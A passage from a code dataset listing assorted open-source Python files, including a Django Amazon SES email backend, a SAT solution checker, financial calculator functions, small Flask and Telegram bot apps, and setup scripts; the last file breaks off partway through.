| code (stringlengths 2–1.05M) | repo_name (stringlengths 5–104) | path (stringlengths 4–251) | language (stringclasses, 1 value) | license (stringclasses, 15 values) | size (int32, 2–1.05M) |
|---|---|---|---|---|---|
# -*- coding: utf-8 -*-
from datetime import datetime, timedelta
from time import sleep
from django.core.mail.backends.base import BaseEmailBackend
from boto.regioninfo import RegionInfo
from boto.ses import SESConnection
from django_ses_backend import settings
# When changing this, remember to change it in setup.py
VERSION = (0, 1, 1)
__version__ = '.'.join([str(x) for x in VERSION])
__author__ = 'Harry Marr & Piotr Buliński'
__all__ = ('SESBackend',)
# These would be nice to make class-level variables, but the backend is
# re-created for each outgoing email/batch.
# recent_send_times also is not going to work quite right if there are multiple
# email backends with different rate limits returned by SES, but that seems
# like it would be rare.
cached_rate_limits = {}
recent_send_times = []
class SESBackend(BaseEmailBackend):
"""A Django Email backend that uses Amazon's Simple Email Service.
"""
def __init__(self, fail_silently=False, aws_access_key=None,
aws_secret_key=None, aws_region_name=None,
aws_region_endpoint=None, aws_auto_throttle=None,
**kwargs):
super(SESBackend, self).__init__(fail_silently=fail_silently, **kwargs)
self._access_key_id = aws_access_key or settings.AWS_SES_ACCESS_KEY_ID
self._access_key = aws_secret_key or settings.AWS_SES_SECRET_ACCESS_KEY
self._region = RegionInfo(
name=aws_region_name or settings.AWS_SES_REGION_NAME,
endpoint=aws_region_endpoint or settings.AWS_SES_REGION_ENDPOINT)
self._throttle = aws_auto_throttle or settings.AWS_SES_AUTO_THROTTLE
self.connection = None
def open(self):
"""Create a connection to the AWS API server. This can be reused for
sending multiple emails.
"""
if self.connection:
return False
try:
self.connection = SESConnection(
aws_access_key_id=self._access_key_id,
aws_secret_access_key=self._access_key,
region=self._region,
)
except:
if not self.fail_silently:
raise
def close(self):
"""Close any open HTTP connections to the API server.
"""
try:
self.connection.close()
self.connection = None
except:
if not self.fail_silently:
raise
def send_messages(self, email_messages):
"""Sends one or more EmailMessage objects and returns the number of
email messages sent.
"""
if not email_messages:
return
new_conn_created = self.open()
if not self.connection:
# Failed silently
return
num_sent = 0
source = settings.AWS_SES_RETURN_PATH
for message in email_messages:
# Automatic throttling. Assumes that this is the only SES client
# currently operating. The AWS_SES_AUTO_THROTTLE setting is a
# factor to apply to the rate limit, with a default of 0.5 to stay
# well below the actual SES throttle.
# Set the setting to 0 or None to disable throttling.
if self._throttle:
global recent_send_times
now = datetime.now()
# Get and cache the current SES max-per-second rate limit
# returned by the SES API.
rate_limit = self.get_rate_limit()
# Prune from recent_send_times anything more than a few seconds
# ago. Even though SES reports a maximum per-second, the way
# they enforce the limit may not be on a one-second window.
# To be safe, we use a two-second window (but allow 2 times the
# rate limit) and then also have a default rate limit factor of
# 0.5 so that we really limit the one-second amount in two
# seconds.
window = 2.0 # seconds
window_start = now - timedelta(seconds=window)
new_send_times = []
for time in recent_send_times:
if time > window_start:
new_send_times.append(time)
recent_send_times = new_send_times
# If the number of recent send times in the last 1/_throttle
# seconds exceeds the rate limit, add a delay.
# Since I'm not sure how Amazon determines at exactly what
# point to throttle, better be safe than sorry and let in, say,
# half of the allowed rate.
if len(new_send_times) > rate_limit * window * self._throttle:
# Sleep the remainder of the window period.
delta = now - new_send_times[0]
total_seconds = (delta.microseconds + (delta.seconds +
delta.days * 24 * 3600) * 10**6) / 10**6
delay = window - total_seconds
if delay > 0:
sleep(delay)
recent_send_times.append(now)
# end of throttling
try:
response = self.connection.send_raw_email(
source=source or message.from_email,
destinations=message.recipients(),
raw_message=message.message().as_string())
message.extra_headers['status'] = 200
message.extra_headers['message_id'] = response[
'SendRawEmailResponse']['SendRawEmailResult']['MessageId']
message.extra_headers['request_id'] = response[
'SendRawEmailResponse']['ResponseMetadata']['RequestId']
num_sent += 1
except SESConnection.ResponseError as err:
# Store failure information so to post process it if required
error_keys = ['status', 'reason', 'body', 'request_id',
'error_code', 'error_message']
for key in error_keys:
message.extra_headers[key] = getattr(err, key, None)
if not self.fail_silently:
raise
if new_conn_created:
self.close()
return num_sent
def get_rate_limit(self):
if self._access_key_id in cached_rate_limits:
return cached_rate_limits[self._access_key_id]
new_conn_created = self.open()
if not self.connection:
raise Exception(
"No connection is available to check current SES rate limit.")
try:
quota_dict = self.connection.get_send_quota()
max_per_second = quota_dict['GetSendQuotaResponse'][
'GetSendQuotaResult']['MaxSendRate']
ret = float(max_per_second)
cached_rate_limits[self._access_key_id] = ret
return ret
finally:
if new_conn_created:
self.close()
|
piotrbulinski/django-ses-backend
|
django_ses_backend/__init__.py
|
Python
|
mit
| 7,068
|
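A minimal configuration sketch for the backend above. The setting names are the ones the code reads (AWS_SES_ACCESS_KEY_ID, AWS_SES_SECRET_ACCESS_KEY, AWS_SES_REGION_NAME, AWS_SES_REGION_ENDPOINT, AWS_SES_AUTO_THROTTLE, AWS_SES_RETURN_PATH); the values and the EMAIL_BACKEND dotted path are illustrative assumptions based on the package layout shown in the metadata:

```python
# settings.py -- illustrative values only
EMAIL_BACKEND = 'django_ses_backend.SESBackend'       # dotted path assumed from the package layout

AWS_SES_ACCESS_KEY_ID = 'YOUR-ACCESS-KEY-ID'          # placeholder
AWS_SES_SECRET_ACCESS_KEY = 'YOUR-SECRET-ACCESS-KEY'  # placeholder
AWS_SES_REGION_NAME = 'us-east-1'
AWS_SES_REGION_ENDPOINT = 'email.us-east-1.amazonaws.com'
AWS_SES_AUTO_THROTTLE = 0.5   # fraction of the SES rate limit to use; 0 or None disables throttling
AWS_SES_RETURN_PATH = None    # optional explicit source address; falls back to message.from_email
```

With the default factor of 0.5, the throttling loop above keeps the number of sends in any two-second window below the per-second quota reported by get_send_quota().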
#!/usr/bin/env python
import sys
with open(sys.argv[2]) as f:
try:
sol = [int(x) for x in f.readline().split()]
if sol == [0]:
print("No satisfying valuation found")
sys.exit(1)
assert all(-x not in sol for x in sol)
except (ValueError, AssertionError):
print("Malformed solution")
sys.exit(2)
with open(sys.argv[1]) as f:
for l in f:
if not l.strip() or l[0] == 'c':
continue
if l[0] == 'p':
_, _, n, _ = l.split()
try:
n = int(n)
except ValueError:
print("Malformed formula")
sys.exit(3)
if len(sol) > 0 and (min(sol) < -n or max(sol) > n):
print("The solution has too many atoms")
sys.exit(2)
else:
try:
if not any(int(x) in sol for x in l.split()):
print("The solution is incorrect")
sys.exit(1)
except ValueError:
print("Malformed formula")
sys.exit(3)
print("The solution is correct")
|
jaanos/LVR-2016
|
homework/common/check-janos.py
|
Python
|
mit
| 1,157
|
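A smoke test for the checker above, with made-up file names and a tiny formula; the script is assumed to be saved as check-janos.py next to this snippet. The formula file is DIMACS CNF, and the solution file holds the chosen literals on its first line (a lone 0 means no satisfying valuation was found):

```python
import subprocess

with open("formula.cnf", "w") as f:
    f.write("c a tiny example\n")
    f.write("p cnf 3 2\n")
    f.write("1 2 0\n")
    f.write("-2 3 0\n")

with open("solution.txt", "w") as f:
    f.write("1 -2 3\n")   # clause "1 2 0" is satisfied by literal 1, clause "-2 3 0" by -2 and 3

# argv[1] is the formula, argv[2] the solution
subprocess.call(["python", "check-janos.py", "formula.cnf", "solution.txt"])
# expected: prints "The solution is correct" and exits with status 0
```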
from __future__ import absolute_import, print_function, unicode_literals
import json
import contextlib
from ._utils import indent
@contextlib.contextmanager
def formatter(stream):
stream.write("{\n")
yield JSONFormatter(stream)
stream.write("\n}\n")
stream.flush()
class JSONFormatter(object):
def __init__(self, stream):
self._stream = stream
self._open = False
def _open_property(self, name):
if self._open:
self._stream.write(",\n")
self._stream.write(" " + json.dumps(name) + ": ")
self._open = True
def _write_property(self, name, value):
self._open_property(name)
self._stream.write(json.dumps(value))
def write_platform(self, platform):
self._write_property("platform", platform)
def write_runner(self, runner):
self._write_property("runner", runner)
def write_stub(self, args):
self._write_property("stub", args)
@contextlib.contextmanager
def tests(self):
self._open_property("tests")
self._stream.write("[\n")
yield JSONFormatter(self._stream)
self._stream.write("\n ]")
def write_test(self, test, result):
if self._open:
self._stream.write(",\n")
self._stream.flush()
obj = {
"result": result.name,
"description": test.description,
"target": "{} {}".format("accept" if test.accept else "reject", test.name),
}
reason = result.reason.rstrip()
if reason:
obj["reason"] = reason
details = result.details.rstrip()
if details:
obj["details"] = details
self._stream.write(indent(json.dumps(obj, indent=4), 8))
self._stream.flush()
self._open = True
|
ouspg/trytls
|
runners/trytls/formatters/json.py
|
Python
|
mit
| 1,815
|
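A minimal usage sketch for the two context managers above. The import path is inferred from the repository layout, and the Test/Result stand-ins only carry the attributes write_test() actually reads; the real runner passes its own richer objects:

```python
import sys
from collections import namedtuple
from trytls.formatters.json import formatter   # import path inferred from the repo layout

Test = namedtuple("Test", "description accept name")     # stand-in objects for illustration
Result = namedtuple("Result", "name reason details")

with formatter(sys.stdout) as fmt:
    fmt.write_platform("CPython 3.8")
    fmt.write_runner("example-runner")
    with fmt.tests() as tests:
        tests.write_test(
            Test(description="expired certificate", accept=False, name="expired.example.com"),
            Result(name="PASS", reason="connection rejected", details=""),
        )
```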
"""
calculator.py
General functions that would be in a financial calculator.
"""
import numpy as np
# Typical Financial Calculator Functions
# ------------------------------------------------------------------------------------------------------------------------------
def future_value(pv=100.0, r=0.07, n=1.0, f=1.0):
"""
Calculate the future value of pv present value after compounding for n periods at r rate every f frequency.
"""
return pv * np.power(1.0 + r / f, n * f)
def present_value(fv=100.0, r=0.07, n=1.0, f=1.0):
"""
Calculate the present value of fv future value before compounding for n periods at r rate every f frequency.
"""
return fv / np.power(1.0 + r / f, n * f)
def rate(fv=100.0, pv=90.0, n=1.0, f=1.0):
"""
Calculate the rate needed to compound a pv present value into a fv future value compounding over n periods every f
frequency.
"""
return f * (np.power(fv / pv, 1.0 / (n * f)) - 1.0)
def periods(fv=0.0, pv=0.0, r=0.0, f=0.0):
"""
Calculate the period needed to compound a pv present value into a fv future value compounding at r rate every f frequency.
"""
return np.log(fv / pv) / (f * np.log(1.0 + r / f))
def effective_return(r=0.07, f=2.0):
"""
Calculate the annual rate needed to equal an r rate at f frequency.
"""
return np.power(1.0 + (r / f), f) - 1.0
def annual_return(r=0.07, f=1.0):
"""
Calculate the annual return from an r periodic return compounded f times per year.
"""
return np.power(1.0 + r, f) - 1.0
def inflation_adjusted(r=0.07, i=0.03):
"""
Calculate inflation adjusted returns.
"""
return (1.0 + r) / (1.0 + i) - 1.0
def gain(xi=100.0, xf=110.0):
"""
Calculate gain from initial to final value.
"""
return (xf - xi) / xi
def amortization(p=1000.0, r=0.05, n=10.0, f=1.0):
"""
Calculate periodic payments needed to pay off p principal at r rate over n periods every f frequency.
"""
return p * (r / f) / (1.0 - np.power(1.0 + r / f, -f*n))
def cagr(xi=100.0, xf=110.0, n=1.0):
"""
Calculate compound annual growth rate.
"""
return np.power(xf / xi, 1.0 / n) - 1.0
def length_of_payment(b=1000.0, p=100.0, apr=0.18):
"""
Calculate the length of payments of b balance with p payment at apr APR.
"""
i = apr / 365.0  # daily periodic rate; the formula below works in 30-day months
return (-1.0 / 30.0) * np.log(1.0 + (b / p)*(1.0 - np.power(1.0 + i, 30.0))) / np.log(1.0 + i)
def annuity(p=100.0, r=0.07, n=10.0, f=1.0):
"""
Calculate future value based on periodic p investment payment at r rate over n periods every f frequency - check this
formula.
"""
return p * ((np.power(1.0 + r / f, n * f) - 1.0) / (r / f))
|
tmthydvnprt/compfipy
|
compfipy/calculator.py
|
Python
|
mit
| 2,674
|
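A quick sanity check of the compounding round-trip described by the docstrings above (a present value grows into a future value and discounts back), assuming the module is importable as compfipy.calculator:

```python
from compfipy import calculator as calc

fv = calc.future_value(pv=1000.0, r=0.06, n=10.0, f=12.0)   # monthly compounding for 10 years
print(round(fv, 2))                                         # ~1819.40
print(round(calc.present_value(fv=fv, r=0.06, n=10.0, f=12.0), 2))   # discounts back to 1000.0
print(round(calc.effective_return(r=0.06, f=12.0), 4))      # ~0.0617 effective annual rate
```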
import math
tri = [
[ 75 ],
[ 95, 64 ],
[ 17, 47, 82 ],
[ 18, 35, 87, 10 ],
[ 20, 4, 82, 47, 65 ],
[ 19, 1, 23, 75, 3, 34 ],
[ 88, 2, 77, 73, 7, 63, 67 ],
[ 99, 65, 4, 28, 6, 16, 70, 92 ],
[ 41, 41, 26, 56, 83, 40, 80, 70, 33 ],
[ 41, 48, 72, 33, 47, 32, 37, 16, 94, 29 ],
[ 53, 71, 44, 65, 25, 43, 91, 52, 97, 51, 14 ],
[ 70, 11, 33, 28, 77, 73, 17, 78, 39, 68, 17, 57 ],
[ 91, 71, 52, 38, 17, 14, 91, 43, 58, 50, 27, 29, 48 ],
[ 63, 66, 4, 68, 89, 53, 67, 30, 73, 16, 69, 87, 40, 31 ],
[ 4, 62, 98, 27, 23, 9, 70, 98, 73, 93, 38, 53, 60, 4, 23 ]
]
best = 0
for row in range(1, len(tri)):
for col in range(len(tri[row])):
#print("%d, %d" % (row, col))
left = tri[row-1][col-1] if col else 0
right = tri[row-1][col] if len(tri[row-1]) > col else 0
tri[row][col] += max(left, right)
best = max(best, tri[row][col])
print("\n".join(str(i) for i in tri))
print(best)
|
jokkebk/euler
|
p18.py
|
Python
|
mit
| 1,040
|
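The loops above are the usual top-down accumulation for Project Euler 18: each cell absorbs the larger of its two parents, so the best total path appears in the fully accumulated triangle. The same recurrence on a toy three-row triangle, for illustration:

```python
# Toy triangle, accumulated with the same recurrence as above.
toy = [
    [3],
    [7, 4],
    [2, 4, 6],
]
for row in range(1, len(toy)):
    for col in range(len(toy[row])):
        left = toy[row - 1][col - 1] if col else 0
        right = toy[row - 1][col] if len(toy[row - 1]) > col else 0
        toy[row][col] += max(left, right)

print(max(toy[-1]))   # best path is 3 -> 7 -> 4, so this prints 14
```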
#! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
Created on Sat Jan 23 10:11:53 2016
@author: ddboline
flask app for make_queue
"""
from __future__ import (absolute_import, division, print_function, unicode_literals)
from movie_collection_app.movie_queue_flask import run_make_queue_flask
if __name__ == '__main__':
run_make_queue_flask()
|
ddboline/movie_collection_app
|
make_queue_flask.py
|
Python
|
mit
| 348
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2013 ecdsa@github
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from electrum_dgb.i18n import _
from util import *
import re
import math
def check_password_strength(password):
'''
Check the strength of the password entered by the user and return a rating
:param password: password entered by user in New Password
:return: password strength Weak, Medium, Strong or Very Strong
'''
password = unicode(password)
n = math.log(len(set(password)))
num = re.search("[0-9]", password) is not None and re.match("^[0-9]*$", password) is None
caps = password != password.upper() and password != password.lower()
extra = re.match("^[a-zA-Z0-9]*$", password) is None
score = len(password)*( n + caps + num + extra)/20
password_strength = {0:"Weak",1:"Medium",2:"Strong",3:"Very Strong"}
return password_strength[min(3, int(score))]
PW_NEW, PW_CHANGE, PW_PASSPHRASE = range(0, 3)
class PasswordLayout(object):
titles = [_("Enter Password"), _("Change Password"), _("Enter Passphrase")]
def __init__(self, wallet, msg, kind, OK_button):
self.wallet = wallet
self.pw = QLineEdit()
self.pw.setEchoMode(2)
self.new_pw = QLineEdit()
self.new_pw.setEchoMode(2)
self.conf_pw = QLineEdit()
self.conf_pw.setEchoMode(2)
self.kind = kind
self.OK_button = OK_button
vbox = QVBoxLayout()
label = QLabel(msg + "\n")
label.setWordWrap(True)
grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnMinimumWidth(0, 150)
grid.setColumnMinimumWidth(1, 100)
grid.setColumnStretch(1,1)
if kind == PW_PASSPHRASE:
vbox.addWidget(label)
msgs = [_('Passphrase:'), _('Confirm Passphrase:')]
else:
logo_grid = QGridLayout()
logo_grid.setSpacing(8)
logo_grid.setColumnMinimumWidth(0, 70)
logo_grid.setColumnStretch(1,1)
logo = QLabel()
logo.setAlignment(Qt.AlignCenter)
logo_grid.addWidget(logo, 0, 0)
logo_grid.addWidget(label, 0, 1, 1, 2)
vbox.addLayout(logo_grid)
m1 = _('New Password:') if kind == PW_NEW else _('Password:')
msgs = [m1, _('Confirm Password:')]
if wallet and wallet.has_password():
grid.addWidget(QLabel(_('Current Password:')), 0, 0)
grid.addWidget(self.pw, 0, 1)
lockfile = ":icons/lock.png"
else:
lockfile = ":icons/unlock.png"
logo.setPixmap(QPixmap(lockfile).scaledToWidth(36))
grid.addWidget(QLabel(msgs[0]), 1, 0)
grid.addWidget(self.new_pw, 1, 1)
grid.addWidget(QLabel(msgs[1]), 2, 0)
grid.addWidget(self.conf_pw, 2, 1)
vbox.addLayout(grid)
# Password Strength Label
if kind != PW_PASSPHRASE:
self.pw_strength = QLabel()
grid.addWidget(self.pw_strength, 3, 0, 1, 2)
self.new_pw.textChanged.connect(self.pw_changed)
def enable_OK():
OK_button.setEnabled(self.new_pw.text() == self.conf_pw.text())
self.new_pw.textChanged.connect(enable_OK)
self.conf_pw.textChanged.connect(enable_OK)
self.vbox = vbox
def title(self):
return self.titles[self.kind]
def layout(self):
return self.vbox
def pw_changed(self):
password = self.new_pw.text()
if password:
colors = {"Weak":"Red", "Medium":"Blue", "Strong":"Green",
"Very Strong":"Green"}
strength = check_password_strength(password)
label = (_("Password Strength") + ": " + "<font color="
+ colors[strength] + ">" + strength + "</font>")
else:
label = ""
self.pw_strength.setText(label)
def old_password(self):
if self.kind == PW_CHANGE:
return unicode(self.pw.text()) or None
return None
def new_password(self):
pw = unicode(self.new_pw.text())
# Empty passphrases are fine and returned empty.
if pw == "" and self.kind != PW_PASSPHRASE:
pw = None
return pw
class PasswordDialog(WindowModalDialog):
def __init__(self, parent, wallet, msg, kind):
WindowModalDialog.__init__(self, parent)
OK_button = OkButton(self)
self.playout = PasswordLayout(wallet, msg, kind, OK_button)
self.setWindowTitle(self.playout.title())
vbox = QVBoxLayout(self)
vbox.addLayout(self.playout.layout())
vbox.addStretch(1)
vbox.addLayout(Buttons(CancelButton(self), OK_button))
def run(self):
if not self.exec_():
return False, None, None
return True, self.playout.old_password(), self.playout.new_password()
|
protonn/Electrum-Cash
|
gui/qt/password_dialog.py
|
Python
|
mit
| 6,019
|
# coding: utf-8
from flask import Flask, render_template, request, redirect, url_for
from sqlalchemy import Column, Integer, create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
from pyuploadcare_sqlalchemy import ImageType
from pyuploadcare import conf
app = Flask(__name__)
conf.pub_key = 'demopublickey'
conf.secret = 'demoprivatekey'
Base = declarative_base()
class Photo(Base):
__tablename__ = 'photo'
id = Column(Integer, primary_key=True)
photo = Column(ImageType(effects='-/resize/x100/'))
engine = create_engine('sqlite:///db.sqlite')
Session = sessionmaker(bind=engine)
Base.metadata.create_all(engine)
@app.route('/')
def index():
session = Session()
items = session.query(Photo).all()
session.close()
return render_template('index.html', items=items)
@app.route('/add', methods=['POST'])
def add_photo():
session = Session()
photo = Photo(photo=request.form['my_file'])
session.add(photo)
session.commit()
session.close()
return redirect(url_for('index'))
if __name__ == "__main__":
app.run(debug=True)
|
uploadcare/pyuploadcare-sqlalchemy
|
example/main.py
|
Python
|
mit
| 1,144
|
#!/usr/bin/python3
import threading
import time
class Scale(threading.Thread):
"""This Scale is a debugging tool for use when real scales are unavailable.
Each instance of Scale launches a thread which generates dummy output
and saves that input to an entry in a dict.
Args:
comPort: string; name of a COM port.
container: dict; shared memory for use by all Scale threads.
index: int; offset from 'A' used to identify the scale.
"""
def __init__(self, comPort, container, index):
threading.Thread.__init__(self, daemon=True)
self.comPort = comPort
self._stop_event = threading.Event()  # avoid shadowing Thread's internal _stop
self.container = container
self.index = index
self.cycle = 0
def run(self):
"""Dummy output data loop."""
ID = chr(ord('A') + self.index)
while not self.stopped():
time.sleep(.5)
value = ID + str(self.cycle)
self.container[ID] = value
self.cycle += 1
# is a stop function necessary if thread runs as daemon?
# maybe necessary to close the serial port?
def stop(self):
self._stop_event.set()
def stopped(self):
return self._stop_event.is_set()
|
bretter/SpudScale
|
src/TestScale.py
|
Python
|
mit
| 1,200
|
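A short driver for the debug scale above, assuming the class is importable from TestScale (per the file path in the metadata). The COM port strings are dummies, since this test class never opens a serial port, and the index is an integer offset from 'A':

```python
import time
from TestScale import Scale   # module name taken from the file path above

readings = {}                                  # shared container for all Scale threads
scales = [Scale("COM%d" % i, readings, i) for i in range(3)]
for s in scales:
    s.start()

time.sleep(2)        # let each daemon thread publish a few dummy values
print(readings)      # e.g. {'A': 'A2', 'B': 'B2', 'C': 'C2'} after ~2 seconds
for s in scales:
    s.stop()
```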
from wonderbot import main
if __name__ == '__main__':
from apscheduler.schedulers.blocking import BlockingScheduler
sched = BlockingScheduler()
sched.add_job(main, 'interval', id='wonderbot', seconds=120)
sched.start()
|
jmwerner/__WonderBot__
|
scheduler.py
|
Python
|
mit
| 240
|
#!/usr/bin/env python
import sys
import logging
import time
import telepot
import json
import commandmanager
reload(sys).setdefaultencoding('utf-8')
logging.basicConfig(filename='telegramadmin.log')
class TelegramAdmin:
def __init__(self):
self.log = logging.getLogger('telegramadmin')
self.config_data = {}
self.bot = None
self.command_list = None
self.command_manager = None
def main_loop(self):
self.bot.message_loop({'chat': self.on_chat_message,
'callback_query': self.on_callback_query})
self.log.info('Listening...')
while 1:
time.sleep(10)
def on_chat_message(self, msg):
content_type, chat_type, chat_id = telepot.glance(msg)
if content_type == 'text':
self.log.info('message received %s' % msg['text'])
self.command_manager.execute_command_message(chat_id, msg['text'])
def on_callback_query(self, msg):
query_id, from_id, query_data = telepot.glance(msg,
flavour='callback_query')
def init(self):
with open('config.json') as json_config_file:
self.config_data = json.load(json_config_file)
TOKEN = self.config_data['token']
self.bot = telepot.Bot(TOKEN)
success = False
while not success:
success = True
try:
self.bot.sendMessage(self.config_data['uid'],'Ok, sono online!')
except:
success = False
self.log.error('Impossible to send message... retry in 10 seconds')
time.sleep(10)
self.command_manager = \
commandmanager.CommandManager(self.bot, self.config_data)
try:
self.command_manager.load_handlers()
except Exception as e:
self.log.error(e)
print 'Error importing modules, see logfiles for more infos'
exit()
if __name__ == "__main__":
server = TelegramAdmin()
server.init()
server.main_loop()
|
miciux/telegram-bot-admin
|
telegramadmin.py
|
Python
|
mit
| 2,107
|
from .sub_sample_2_1 import (
sub_sample_2_1_now, sub_sample_2_1_sleep,
sub_sample_2_1_time, sub_sample_2_1_today
)
__all__ = [
"sub_sample_2_1_now", "sub_sample_2_1_sleep",
"sub_sample_2_1_time", "sub_sample_2_1_today"
]
|
alisaifee/hiro
|
tests/emulated_modules/sub_module_2/__init__.py
|
Python
|
mit
| 239
|
import matplotlib.pyplot as plt
import UpDownMethods as ud
def plot_results(results, midpoints=False, figure=None, estimate=False,
reversals=False, runs=True):
if figure is None:
figure = plt.figure()
figure.clf()
figure.add_subplot(111)
plt.hold(True)
# Plot correct responses
corr = results[results['Responses'] == True]
if len(corr) > 0:
plt.scatter(corr.index+1, corr.Value, s=50, marker='+', c='k')
# Plot incorrect responses
incorr = results[results['Responses'] == False]
if len(incorr) > 0:
plt.scatter(incorr.index+1, incorr.Value, s=50, marker='_', c='k')
# Indicate reversals
if reversals:
reversal = results[results['Reversal'] == True]
if len(reversal) > 0:
plt.scatter(reversal.index+1, reversal.Value, facecolors='none',
edgecolors='k', s=200)
# Track the runs
if runs is not False:
runs = ud.runs(results)
for i in range(len(runs)):
r = runs.iloc[[i]]
start = r["Start"]
end = r["Finish"]
mid = start + (end-start)/2
runY = min(results.Value)-1
plt.errorbar(mid, runY, xerr=(end-start)/2, c='k')
plt.annotate(str(int(i+1)), xy=(mid, runY-0.5), xytext=(mid, runY-0.5))
if estimate is not False:
est = ud.estimate_reversals(results, num=estimate)
if est is not None:
plt.axhline(y=est, ls='--')
plt.text(0, est+0.05, "Estimate = " + str(est), fontsize=12)
if midpoints:
mids = ud.midpoints(results)
for i in range(len(mids)):
plt.scatter(mids['CentreTrial'].values[i],
mids['Midpoint'].values[i], c='r')
if len(results) > 0:
plt.xlim(-0.5, max(results.index) + 2.5)
plt.ylabel('Stimulus Value', fontsize=14)
plt.xlabel('Trial Number', fontsize=14)
return figure
|
codles/UpDownMethods
|
UpDownMethods/plot.py
|
Python
|
mit
| 1,966
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
def set_themes(apps, schema_editor):
Theme = apps.get_model("themes", "Theme")
default_theme = Theme.objects.get(is_default=True)
HomePage = apps.get_model('core', 'HomePage')
home, created = HomePage.objects.get_or_create(
slug="home"
)
home.theme_id = default_theme.id
home.save()
class Migration(migrations.Migration):
dependencies = [
('core', '0019_set_contact_email'),
('themes', '0006_create_themes'),
]
operations = [
migrations.RunPython(set_themes),
]
|
OpenCanada/website
|
core/migrations/0020_assign_theme_to_homepage.py
|
Python
|
mit
| 653
|
#
# mainTab
#
tab = self.notebook.mainTab
tab.settings['Program'] = 'castep'
tab.settings['Output file name'] = 'phonon.castep'
#
# SettingsTab
#
tab = self.notebook.settingsTab
tab.settings['Eckart flag'] = False
tab.settings['Neutral Born charges'] = False
tab.settings['Sigma value'] = 5
tab.settings['Mass definition'] = 'program'
#
# 0th Scenario tabs
#
tab = self.notebook.scenarios[0]
tab.settings['Matrix'] = 'ptfe'
tab.settings['Mass or volume fraction'] = 'volume'
tab.settings['Volume fraction'] = 0.1
tab.settings['Ellipsoid a/b'] = 0.5
tab.settings['Unique direction - h'] = 0
tab.settings['Unique direction - k'] = 0
tab.settings['Unique direction - l'] = 1
tab.settings['Effective medium method'] = 'Mie'
tab.settings['Particle shape'] = 'Sphere'
tab.settings['Particle size(mu)'] = 1.0
tab.settings['Particle size distribution sigma(mu)'] = 0.0
tab.settings['Legend'] = 'Mie single particle size 1.0mu'
# Add new scenarios
methods = ['Mie']
shapes = ['Sphere']
hkls = [[0,0,0]]
vfs = [0.1]
sizes = [1.0, 1.0, ]
sigmas = [0.1, 0.5, ]
for method in methods:
for shape,hkl in zip(shapes,hkls):
for vf in vfs:
for size,sigma in zip(sizes,sigmas):
self.notebook.addScenario()
tab = self.notebook.scenarios[-1]
tab.settings['Volume fraction'] = vf
tab.settings['Particle shape'] = shape
tab.settings['Particle size(mu)'] = size
tab.settings['Effective medium method'] = method
tab.settings['Particle size distribution sigma(mu)'] = sigma
tab.settings['Unique direction - h'] = hkl[0]
tab.settings['Unique direction - k'] = hkl[1]
tab.settings['Unique direction - l'] = hkl[2]
#tab.settings['Legend'] = method + ' ' + shape + ' vf='+str(vf)+' size='+str(size)+' sigma=',str(sigma)
tab.settings['Legend'] = method + ' vf='+str(vf)+' size='+str(size)+' sigma='+str(sigma)
#
# Plotting Tab
#
tab = self.notebook.plottingTab
tab.settings['Minimum frequency'] = 300.0
tab.settings['Maximum frequency'] = 800.0
tab.settings['Frequency increment'] = 0.2
tab.settings['Molar definition'] = 'Unit cells'
tab.settings['Plot title'] = 'Mie method - Castep MgO - LogNormal Distribution'
#
# Analysis Tab
#
tab = self.notebook.analysisTab
tab.settings['Minimum frequency'] = -1
tab.settings['Maximum frequency'] = 800
tab.settings['title'] = 'Analysis'
tab.settings['Covalent radius scaling'] = 1.1
tab.settings['Bonding tolerance'] = 0.1
tab.settings['Bar width'] = 0.5
#
|
JohnKendrick/PDielec
|
Examples/Mie/MgO_lognormal/script.py
|
Python
|
mit
| 2,598
|
from setuptools import setup
setup(name='PyYacht',
version='0.2',
description='Yacht race starter',
url='https://github.com/HUg0005/PyYacht',
author='Hayden Hughes',
author_email='mrhaydenhughes@gmail.com',
license='MIT',
scripts=['bin/PyStart.py'],
zip_safe=False)
|
HUg0005/PyYacht
|
setup.py
|
Python
|
mit
| 324
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-10-05 15:37
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('rank', '0005_systemmessage'),
]
operations = [
migrations.AddField(
model_name='systemmessage',
name='name',
field=models.CharField(default='test', max_length=100),
preserve_default=False,
),
]
|
dreardon/leaderboard
|
rank/migrations/0006_systemmessage_name.py
|
Python
|
mit
| 499
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) Spyder Project Contributors
#
# Licensed under the terms of the MIT License
# (see LICENSE.txt for details)
# -----------------------------------------------------------------------------
"""Setup script for spyder_vim"""
# Standard library imports
import ast
import os
# Third party imports
from setuptools import find_packages, setup
HERE = os.path.abspath(os.path.dirname(__file__))
def get_version(module='spyder_vim'):
"""Get version."""
with open(os.path.join(HERE, module, '__init__.py'), 'r') as f:
data = f.read()
lines = data.split('\n')
for line in lines:
if line.startswith('VERSION_INFO'):
version_tuple = ast.literal_eval(line.split('=')[-1].strip())
version = '.'.join(map(str, version_tuple))
break
return version
def get_description():
"""Get long description."""
with open(os.path.join(HERE, 'README.rst'), 'r') as f:
data = f.read()
return data
REQUIREMENTS = ['spyder>=3.2.0']
setup(
